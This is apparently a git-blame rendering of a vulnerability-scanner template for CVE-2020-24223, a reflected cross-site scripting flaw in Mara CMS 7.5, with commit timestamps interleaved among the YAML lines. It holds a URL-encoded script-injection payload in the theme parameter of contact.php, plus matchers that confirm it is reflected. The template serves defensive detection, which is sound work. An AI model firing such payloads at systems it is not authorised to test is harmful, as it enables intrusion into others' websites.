2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-24223
|
2020-09-01 18:16:14 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
|
|
|
|
author: pikpikcu
|
2020-09-01 18:31:57 +00:00
|
|
|
severity: medium
|
2020-09-01 18:16:14 +00:00
|
|
|
|
|
|
|
# Vendor Homepage: https://sourceforge.net/projects/maracms/
|
|
|
|
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
|
|
|
|
# Source: https://www.exploit-db.com/exploits/48777
|
|
|
|
|
|
|
|
requests:
|
2020-09-17 09:58:51 +00:00
|
|
|
- method: GET
|
2020-09-01 18:16:14 +00:00
|
|
|
path:
|
2020-09-04 05:55:13 +00:00
|
|
|
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
2020-09-01 18:16:14 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"><script>alert(document.domain)</script>'
|
2020-12-13 19:24:23 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|